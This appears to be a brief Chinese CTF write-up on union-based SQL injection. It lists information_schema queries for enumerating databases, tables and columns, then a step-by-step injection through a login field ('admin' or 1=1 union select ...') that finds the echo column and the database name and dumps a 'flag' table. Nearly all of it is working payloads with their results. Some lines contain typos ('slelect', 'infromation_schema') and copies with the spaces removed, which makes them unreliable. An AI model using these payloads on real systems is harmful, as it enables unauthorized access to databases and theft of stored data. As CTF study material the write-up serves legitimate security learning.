查询数据库:select schema_name from information_schema.schemata#
slelect database()#
查询数据库表:select table_name from information_schema.tables where table_schema='数据库名'#
查询字段名:select column_name from infromation_schema.columns where table_name='表名'#
查询字段内容:select * from 表名#
1 2 3 4 5 6 7 8 9 10 11 12
admin' or 1=1 order by 3# //有回显 admin'or1=1orderby4# //无回显
admin' or 1=1 union select 1,2,3# //位置是2 admin'or1=1unionselect1,database(),3# //数据库名字是web2
admin' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# //表名字为flag,user admin'or1=1unionselect1,group_concat(column_name),3from information_schema.columns where table_name="flag"# // 字段名为flag
admin' or 1=1 union select 1,flag,3 from flag# //得到flag